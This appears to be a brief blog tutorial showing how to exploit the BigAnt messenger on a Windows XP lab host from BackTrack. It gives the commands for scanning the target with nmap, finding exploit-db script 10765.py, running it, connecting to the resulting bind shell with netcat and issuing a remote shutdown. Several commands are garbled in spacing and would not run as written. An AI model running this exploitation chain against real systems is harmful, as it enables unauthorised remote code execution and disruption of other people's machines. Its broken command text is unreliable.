This time I wanted to exploit BigAnt windows xp with the help ekspoitdb.
Information Gathering and Service Enumeration
First, do the Information Gathering and Service Enumeration
using nmap, type:
root @ bt: ~ # nmap-v-A-sV-p 1-65535 172.16.227.128
and the results are as above
first you need to know the target ip
Then we know that strange port that is rarely active in windows xp normal, such as port 6661 and port 6660 is the port of BigAnt application is installed.
Vulnerability
after that we find vulnerability of BigAnt applications using exploitdb, by exploitdb open directory on the menu backtrack. or type in the terminal:
root @ bt: ~ # cd / pentest / exploits / exploitdb /
root @ bt: ~ # ls
files.csv | platforms | searchsploit
Here there are three menus,
- Csv file
- platforms
- searchsploit
First, we perform vulnerability of BigAnt using exploitdb directory. able to open it directly to backtrack menu or via terminal by typing:
root @ bt :/ pentest / exploits / exploitdb #. / searchsploit BigAnt
to see the exploits available on exploitdb
and the results are as above.
second, check in the menu for the platforms we know how to exploit. by typing:
root @ bt :/ pentest / exploits / exploitdb # cat platforms/windows/remote/10765.py
and the results are as above
Exploitation
First, do the exploitation by means of:
root @ bt :/ pentest / exploits / exploitdb # python platforms/windows/remote/10765.py 172.16.227.128
when you success of the note as follows:
Exploit sent! Connect to a remote host on port 4444
Second, we entered into a target system by means of:
root @ bt :/ pentest / exploits / exploitdb # nc-v 172.16.227.128 4444
if you are successful will appear as follows.
terminal automatically backtrack we will become a target cmd
C:\WINDOWS\system32>
to try whether it could successfully enter:
C: \ WINDOWS \ system32> shutdown-s-t 60
and will appear as above
0 komentar:
Posting Komentar